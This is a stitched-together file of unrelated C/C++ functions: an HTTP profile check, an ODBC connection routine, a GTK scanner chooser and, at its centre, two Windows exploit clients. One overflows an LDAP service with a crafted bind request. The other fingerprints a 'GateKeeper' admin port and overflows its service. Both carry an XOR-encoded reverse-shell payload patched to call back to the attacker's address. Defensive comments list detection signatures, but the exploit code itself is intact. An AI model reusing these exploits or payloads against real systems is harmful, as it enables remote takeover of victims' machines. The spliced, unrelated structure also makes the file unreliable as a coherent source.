/** \brief Validate this profile by validating the sub-profiles it contains
 *
 * \return the error reported by the first failing sub-profile, or
 *         http_err_t::OK when every sub-profile is valid
 */
http_err_t	http_sresp_profile_t::check()	const throw()
{
	// the connection sub-profile is the only one checked here
	http_err_t	cnx_err	= cnx().check();
	if( cnx_err.failed() ){
		// propagate the sub-profile error unchanged
		return cnx_err;
	}

	// nothing failed
	return http_err_t::OK;
}
/*
 * Command-line entry point.
 *
 * Expects exactly three arguments (<host> <your_ip> <your_port>), starts
 * Winsock 1.1, connects to <host> through cnx() and hands the socket plus
 * the caller-supplied address/port to start_auth().  Both helpers are
 * defined outside this listing.
 *
 * Returns 0 once start_auth() has returned, -1 on a usage error, a Winsock
 * start-up failure or a failed connection.
 */
int main(int argc, char *argv[])
{
	WSADATA winsock_info;
	int conn;

	banner();

	/* usage check comes first so argv[1..3] are known to exist below */
	if (argc != 4) {
		printf("syntax: %s <host> <your_ip> <your_port>\r\n", argv[0]);
		return -1;
	}

	/* 0x0101 requests Winsock version 1.1 */
	if (WSAStartup(0x0101, &winsock_info) != 0) {
		printf("error: unable to load winsock\r\n");
		return -1;
	}

	/* cnx() signals failure with a zero return */
	conn = cnx(argv[1]);
	if (conn == 0)
		return -1;

	/* the port argument is converted with atoi() and passed on unvalidated */
	start_auth(conn, argv[2], atoi(argv[3]));

	return 0;
}
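/**
 * Open a new ODBC connection to the configured DSN with the given credentials.
 *
 * Allocates an ODBC environment and connection handle, connects with
 * SQLDriverConnect and wraps both handles in a Connection that is tagged with
 * this database's provider and schema.  The whole call is serialised on
 * g_i_mutex.
 *
 * Security notes:
 *  - the password is never written to the log; the connection string is
 *    logged with the PWD value redacted;
 *  - a credential containing ';' is brace-quoted so it cannot terminate its
 *    attribute early and smuggle extra attributes (for example a different
 *    DRIVER or SERVER) into the connection string.
 *
 * @param user      database user name
 * @param password  database password
 * @return the connected Connection
 * @throws SQLException when a handle cannot be allocated or the connection
 *         is refused; the message names the DSN and the user, never the
 *         password
 */
std::shared_ptr<Connection> Database::getConnection(std::string user,std::string password)
{
    LOG_DEBUG(std::string(__FILE__) + " " + std::to_string(__LINE__));
    std::lock_guard<std::mutex> lock(g_i_mutex);

    // getenv() returns NULL for an unset variable, and building a std::string
    // from NULL is undefined behaviour, so substitute a visible marker.
    auto envOrUnset = [](const char *name) -> std::string {
        const char *value = getenv(name);
        return value ? std::string(value) : std::string("(unset)");
    };

    // Values without ';' are passed through unchanged.  A value that contains
    // ';' is wrapped in braces with '}' doubled.
    // NOTE(review): '}}' is the escape commonly documented for ODBC drivers;
    // confirm it for the driver behind this DSN.
    auto attrValue = [](const std::string &value) -> std::string {
        if (value.find(';') == std::string::npos)
            return value;
        std::string quoted = "{";
        for (char c : value) {
            quoted += c;
            if (c == '}')
                quoted += '}';
        }
        quoted += '}';
        return quoted;
    };

    SQLHENV henv = SQL_NULL_HENV;
    SQLHDBC hdbc = SQL_NULL_HDBC;

    if (!SQL_SUCCEEDED(SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &henv)))
        throw SQLException(std::string("SQLAllocHandle failed for the ODBC environment"));
    SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION, (void *) SQL_OV_ODBC3, 0);
    if (!SQL_SUCCEEDED(SQLAllocHandle(SQL_HANDLE_DBC, henv, &hdbc))) {
        // do not leak the environment handle when the connection handle fails
        SQLFreeHandle(SQL_HANDLE_ENV, henv);
        throw SQLException(std::string("SQLAllocHandle failed for the ODBC connection"));
    }

    SQLRETURN ret;
    SQLCHAR outstr[1024];
    SQLSMALLINT outstrlen;

    const std::string dsnprefix = "DSN=" + dsnentry_ + ";UID=" + attrValue(user) + ";PWD=";
    const std::string dsnname = dsnprefix + attrValue(password);

    LOG_DEBUG(std::string("ODBCSYSINI :") + envOrUnset("ODBCSYSINI"));
    LOG_DEBUG(std::string("ODBCINI:") + envOrUnset("ODBCINI"));
    LOG_DEBUG(std::string("TNS_ADMIN:") + envOrUnset("TNS_ADMIN"));
    // Debug logs are routinely shipped and retained; keep the secret out of them.
    LOG_DEBUG(dsnprefix + "<redacted>");

    ret = SQLDriverConnect(hdbc, NULL, (SQLCHAR*)dsnname.c_str(), SQL_NTS,
                           outstr, sizeof(outstr), &outstrlen, SQL_DRIVER_COMPLETE);
    LOG_DEBUG(std::string(__FILE__) + " " + std::to_string(__LINE__));

    if (!SQL_SUCCEEDED(ret)) {
        ODBCError err;
        // Read the diagnostics before the handle they are attached to is freed.
        std::string message = err("SQLDriverConnect", hdbc, SQL_HANDLE_DBC) + "\nDSN : " + dsnentry_ + "\nDatabase user : " + user;
        // A failed attempt must not leak its handles: repeated bad logins
        // would otherwise exhaust driver-manager resources.
        SQLFreeHandle(SQL_HANDLE_DBC, hdbc);
        SQLFreeHandle(SQL_HANDLE_ENV, henv);
        throw SQLException(message);
    }

    if (ret == SQL_SUCCESS_WITH_INFO) {
        LOG_DEBUG("SQLDriverConnect");
        ODBCError err;
        LOG_DEBUG(err("SQLDriverConnect", hdbc, SQL_HANDLE_DBC));
    }

    // The Connection receives both handles; presumably it releases them in
    // its destructor (TODO confirm against Connection).
    std::shared_ptr<Connection> cnx(new Connection(user,password,henv,hdbc));
    cnx->setProvider(provider_);
    cnx->setSchema(schema_);
    LOG_DEBUG(std::string("Provider set for connection : ") + DBPROVIDERS[provider_]);
    return cnx;
}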
/*
 * Proof-of-concept client for a memory-corruption flaw in an LDAP service.
 *
 * What the code below does, as far as this listing shows:
 *   - parses <host>, a callback address and port, a one-digit <version>
 *     index (0-2) and an optional one-digit [OSver] index (0-1);
 *   - patches the callback address and port into an XOR-encoded payload;
 *   - connects to TCP port 389 on <host> and sends one oversized bind
 *     request.
 *
 * Points a defender can key on, all taken from the constants visible here:
 *   - a message to port 389 that opens with 30 82 0a 3d and carries a bind
 *     request whose version INTEGER declares a length byte of 0xff;
 *   - roughly 7000 consecutive 0x90 bytes inside an LDAP bind;
 *   - a single send of sizeof(buffer)-1 = 8094 bytes.
 * The durable fix is on the server: reject BER elements whose declared
 * length is malformed or exceeds the receive buffer.
 *
 * SEH_ADDR, HIJACKED_*, HOP, POP, banner(), syntax() and cnx() are defined
 * outside this listing.
 */
int main(int argc, char *argv[])
{
	int sock,bytes,target,osver=0;
	WSADATA wsaData;
	char buffer[8095];
	unsigned long host,port;
	unsigned int i;

	/* hand-built start of an LDAP bind request; the per-field comments are the author's */
	char req1[] =	"\x30\x82"	/* bind request */
			"\x0a\x3d"	/* bind req len */
			/* msg id */
			"\x02"		/* integer */
			"\x01"		/* length */
			"\x01"		/* value */
			"\x60"		/* bind request */
			"\x82"		/* msg length 2bytes */
			"\x01\x36"	/* msg length */
			/* LDAP ver */
			"\x02"		/* integer */
			"\xff"		/* length */
			"\x03"		/* value */
			"\x05\x00"	/* DN NULL */
			"\x80\x00";	/* Auth simple */

	/* encoded payload; the callback address and port are patched in further down */
	char shellc0de[] =
		/* sizeof(shellc0de+xorer) == 334 bytes */
		/* classic xorer */
		"\x90"
		"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
		"\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
		/* reverse remote shell */
		"\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
		"\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
		"\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
		"\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
		"\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
		"\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
		"\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
		"\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
		"\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
		"\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
		"\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
		"\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
		"\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
		"\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
		"\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
		"\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
		"\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
		"\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
		"\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
		"\x57\x91\x95";

	banner();
	/* NOTE(review): execution continues after syntax() unless syntax() itself exits - not visible here */
	if(argc<5||argc>6) syntax(argv[0]);

	/* the address is stored XORed with 0x95959595; presumably the same 0x95 key the payload is encoded with */
	host=inet_addr(argv[2])^0x95959595;
	port=atoi(argv[3]);

	/* <version> must be a single digit in 0..2 */
	if(!isdigit(argv[4][0])||strlen(argv[4])>1) {
		printf("error: <version> must be one digit\r\n");
		syntax(argv[0]);
		return -1;
	}
	target=atoi(argv[4]);
	if(target<0||target>2) {
		printf("error: <version> must be 0, 1 or 2\r\n");
		syntax(argv[0]);
		return -1;
	}

	/* optional [OSver] must be a single digit in 0..1 */
	if(argc==6) {
		if(!isdigit(argv[5][0])||strlen(argv[5])>1) {
			printf("error: [OSver] must be one digit\r\n");
			syntax(argv[0]);
			return -1;
		}
		osver=atoi(argv[5]);
		if(osver<0||osver>1) {
			printf("error: [OSver] must be 0 or 1\r\n");
			syntax(argv[0]);
			return -1;
		}
	}

	if(port<=0||port>65535) {
		printf("error: <port> must be between 1 and 65535\r\n");
		syntax(argv[0]);
		return -1;
	}

	/* pack the port (network byte order) into the upper 16 bits with 0x0002 below it, then XOR with 0x95959595 */
	port=htons((unsigned short)port);
	port=port<<16;
	port+=0x0002;
	port=port^0x95959595;

	/* overwrite the first run of four HOP bytes with the address and the first run of four POP bytes with the port */
	for(i=0; i<sizeof(shellc0de); i++) {
		if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
			if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
				memcpy(&shellc0de[i],&host,4);
				host=0;
			}
		if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
			if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
				memcpy(&shellc0de[i],&port,4);
				port=0;
			}
	}
	/* both variables are zeroed only when their marker was found */
	if(host||port) {
		printf("error: unabled to find ip/port sequence in shellc0de\r\n");
		return -1;
	}

	/* 0x0101 requests Winsock version 1.1 */
	if(WSAStartup(0x0101,&wsaData)!=0) {
		printf("error: unable to load winsock\r\n");
		return -1;
	}

	/* 389 is the standard LDAP port */
	sock=cnx(argv[1],389);
	if(!sock) return -1;

	/* <----- magic packet -----> */
	/* 13 header bytes from req1, followed by 7010 bytes of 0x90 filler */
	strncpy(buffer,req1,13);
	memset(&buffer[13],0x90,7010);
	/* offset 13 receives SEH_ADDR, offset 17 a per-target constant chosen by osver/target */
	*(unsigned long*)&buffer[13] = SEH_ADDR;
	if(!osver) {
		if(!target) *(unsigned long*)&buffer[17] = HIJACKED_2K_PRO;
		else if(target==1) *(unsigned long*)&buffer[17] = HIJACKED_2K_EXP;
		else *(unsigned long*)&buffer[17] = HIJACKED_2K_EVL;
	} else {
		if(!target) *(unsigned long*)&buffer[17] = HIJACKED_XP_PRO;
		else if(target==1) *(unsigned long*)&buffer[17] = HIJACKED_XP_EXP;
		else *(unsigned long*)&buffer[17] = HIJACKED_XP_EVL;
	}
	*(unsigned long*)&buffer[21] = 0x90909013; // to avoid 0x00 <unwanted instructions> on winXP
	/* payload at offset 200 (terminating NUL excluded); four bytes of req1 copied in at offset 7023 */
	memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1);
	memcpy(&buffer[7000+23],&req1[10],4);

	printf("[+] Sending magic packet ...");
	/* NOTE(review): buffer is never initialised past offset 7026, so the tail of the 8094 bytes sent is stack residue; a signature should not depend on it */
	bytes=send(sock,buffer,sizeof(buffer)-1,0);
	printf("Done\r\n");
	if(bytes==0) {
		printf("error: send()\r\n");
	}
	closesocket(sock);
	return 0;
}
/*
 * Proof-of-concept client for a memory-corruption flaw in a network service
 * that also exposes an administration interface.
 *
 * What the code below does, as far as this listing shows:
 *   - patches a caller-supplied callback address and port into an
 *     XOR-encoded payload;
 *   - connects to ADMIN_PORT, sends a fixed probe line and looks for a
 *     "GateKeeper@" banner to compare the reported version with VERSION;
 *   - connects to PORT and sends REQ, a SIZE-byte buffer of 0x90 filler that
 *     carries the payload and an overwritten return address, then REQ2.
 *
 * Points a defender can key on, all taken from the strings and constants
 * visible here:
 *   - the literal line "I'm a script kiddie\r\n" arriving on the
 *     administration port;
 *   - the administration interface disclosing "GateKeeper@<version>" to an
 *     unauthenticated peer, which is what makes the version check possible;
 *     restricting who can reach that port removes the fingerprinting step;
 *   - a request body made up almost entirely of 0x90 bytes.
 *
 * SIZE, HOP, POP, ADMIN_PORT, PORT, VERSION, RET_POS, RET_ADDR, REQ, REQ2,
 * banner(), syntax() and cnx() are defined outside this listing.
 */
int main(int argc, char *argv[])
{
	WSADATA wsaData;
	int sock;
	char buffer[1024],useme[SIZE],*ptr;
	unsigned long host,port;
	unsigned int i;

	/* encoded payload; the callback address and port are patched in further down */
	char shellc0de[] =
		/* sizeof(shellc0de+xorer) == 332 bytes */
		/* classic xorer */
		"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
		"\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
		/* shellc0de */
		"\x1e\x61\xc0\xc3\xf1\x34\xa5"
		"\x95\x95\x95\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e"
		"\x50\xcb\xc8\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95"
		"\x95\xfd\xa6\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d"
		"\xc2\xfd\x4c\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4"
		"\xc4\xd4\xc4\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5"
		"\x7d\xec\x95\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e"
		"\x59\xff\x85\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3"
		"\xa5\x6a\xa3\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b"
		"\x16\x79\xc1\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68"
		"\x53\xd1\xb1\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1"
		"\x1c\xd1\xb1\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85"
		"\xc1\xc5\xc4\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b"
		"\x6a\xa3\xfd\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0"
		"\xc3\xc2\x1e\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e"
		"\xdf\x8d\x1e\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6"
		"\x6a\x69\xa6\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67"
		"\xae\xe9\xb1\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e"
		"\xcf\x89\x96\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca"
		"\xcb\xc8\xce\x57\x91\x95";

	banner();
	/* NOTE(review): execution continues after syntax() unless syntax() itself exits - not visible here */
	if(argc!=4) syntax(argv[0]);

	/* the address is stored XORed with 0x95959595; presumably the same 0x95 key the payload is encoded with */
	host=inet_addr(argv[2])^0x95959595;
	port=atoi(argv[3]);
	if(port<=0||port>65535) {
		printf("error: <port> must be between 1 and 65535\r\n");
		return -1;
	}

	/* pack the port (network byte order) into the upper 16 bits with 0x0002 below it, then XOR with 0x95959595 */
	port=htons((unsigned short)port);
	port=port<<16;
	port+=0x0002;
	port=port^0x95959595;

	/* overwrite the first run of four HOP bytes with the address and the first run of four POP bytes with the port */
	for(i=0;i<sizeof(shellc0de);i++) {
		if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
			if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
				memcpy(&shellc0de[i],&host,4);
				host=0;
			}
		if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
			if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
				memcpy(&shellc0de[i],&port,4);
				port=0;
			}
	}
	/* both variables are zeroed only when their marker was found */
	if(host||port) {
		printf("[i] error: unabled to find ip/port sequence in shellc0de\r\n");
		return -1;
	}

	/* 0x0101 requests Winsock version 1.1 */
	if(WSAStartup(0x0101,&wsaData)!=0) {
		printf("[i] error: unable to load winsock\r\n");
		return -1;
	}

	/* version fingerprinting through the administration port; a failed connection is only a warning */
	printf("[-] Getting version through administration interface\r\n");
	sock=cnx(argv[1],ADMIN_PORT);
	if(!sock) printf("[i] warning: couldn't connect to admin int to get version, trying anyway\r\n");
	else {
		/* fixed probe line: a stable string to search for in admin-interface logs or packet captures */
		send(sock,"I'm a script kiddie\r\n",21,0);
		/* the first reply is discarded; only the second is searched for the banner */
		memset(buffer,0,sizeof(buffer));
		recv(sock,buffer,sizeof(buffer),0);
		memset(buffer,0,sizeof(buffer));
		recv(sock,buffer,sizeof(buffer),0);
		ptr=strstr(buffer,"GateKeeper@");
		if(!ptr) printf("[i] waring: version not found, trying anyway\r\n");
		else {
			/* 11 == strlen("GateKeeper@"): step over the banner prefix to the version text */
			ptr+=11;
			if(strncmp(ptr,VERSION,strlen(VERSION))) {
				printf("[i] error: wrong version\r\n");
				return -1;
			}
			printf("[i] %-44s ...OK\r\n","version");
		}
	}

	/* NOTE(review): the administration socket is never closed before sock is reused for the second connection */
	printf("[i] Starting to exploit\r\n");
	sock=cnx(argv[1],PORT);
	if(!sock) return -1;

	printf("[i] Preparing magic %-28s ...","packet");
	/* SIZE bytes of 0x90 filler; payload placed 0x8ac bytes before RET_POS */
	memset(useme,0x90,SIZE);
	memcpy(&useme[RET_POS-0x8ac],shellc0de,sizeof(shellc0de));
	*(unsigned long*)&useme[RET_POS] = RET_ADDR; // eip pointing to jmp ebx in exe memory
	memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5); // jmp $ - 0x92c
	printf("Done\r\n");

	/* the request goes out as three sends: REQ, the filler buffer, REQ2 */
	printf("[i] Sending magic packet ...");
	send(sock,REQ,strlen(REQ),0);
	send(sock,useme,sizeof(useme),0);
	send(sock,REQ2,strlen(REQ2),0);
	printf("Done\r\n");
	closesocket(sock);
	return 0;
}
/**
 * Create the scanner object for the device whose UDI equals \a udi and
 * announce it through signal_device_changed_.
 *
 * Nothing happens when \a devices holds no entry with that UDI.  When the
 * connexion or the scanner cannot be created, the previously active entry
 * (if any) is selected again with callbacks inhibited and a
 * std::runtime_error naming the device is thrown.
 */
void
chooser::create_device (const std::set<scanner::info>& devices,
                        const std::string& udi)
{
  // Linear search for the entry with a matching UDI.
  std::set<scanner::info>::const_iterator match = devices.begin ();
  for (; devices.end () != match && udi != match->udi (); ++match)
    {
    }
  if (devices.end () == match) return;

  // Show a busy cursor while the (possibly slow) creation runs.
  Glib::RefPtr< Gdk::Window > toplevel = get_window ();
  if (toplevel)
    {
      toplevel->set_cursor (Gdk::Cursor (Gdk::WATCH));
      Gdk::flush ();
    }

  scanner::ptr device;
  std::string  reason;

  try
    {
      // FIXME Clunky, but both create() calls may take a while and
      //       cannot move to a separate thread when the connexion
      //       and/or scanner objects run via process separation:
      //       the child process would exit when the thread ends.
      //       Pending GUI events are drained before each call
      //       instead.
      while (Gtk::Main::events_pending ())
        {
          Gtk::Main::iteration ();
        }
      connexion::ptr cnx (connexion::create (match->connexion (),
                                             match->path ()));

      while (Gtk::Main::events_pending ())
        {
          Gtk::Main::iteration ();
        }
      device = scanner::create (cnx, *match);
    }
  catch (const std::exception& e)
    {
      reason = e.what ();
    }
  catch (...)
    {
      // FIXME no reason is recorded for non-standard exceptions
    }

  // Back to the default cursor whatever the outcome.
  if (toplevel)
    {
      toplevel->set_cursor ();
    }

  if (!device)
    {
      // Capture the failed entry's texts before the selection is
      // rolled back.
      const std::string& failed_name
        = get_active ()->get_value (cols_->name);
      const std::string& failed_udi
        = get_active ()->get_value (cols_->udi);

      // Roll back without re-triggering the change handler.
      inhibit_callback_ = true;
      if (cache_) set_active (cache_);
      inhibit_callback_ = false;

      BOOST_THROW_EXCEPTION
        (std::runtime_error
         ((format (_("Cannot access %1%\n(%2%)\n%3%"))
           % failed_name
           % failed_udi
           % _(reason)
           ).str ()));
    }

  // Success: remember the selection and tell listeners.
  cache_ = get_active ();
  set_tooltip_text (match->udi ());
  signal_device_changed_.emit (device);
}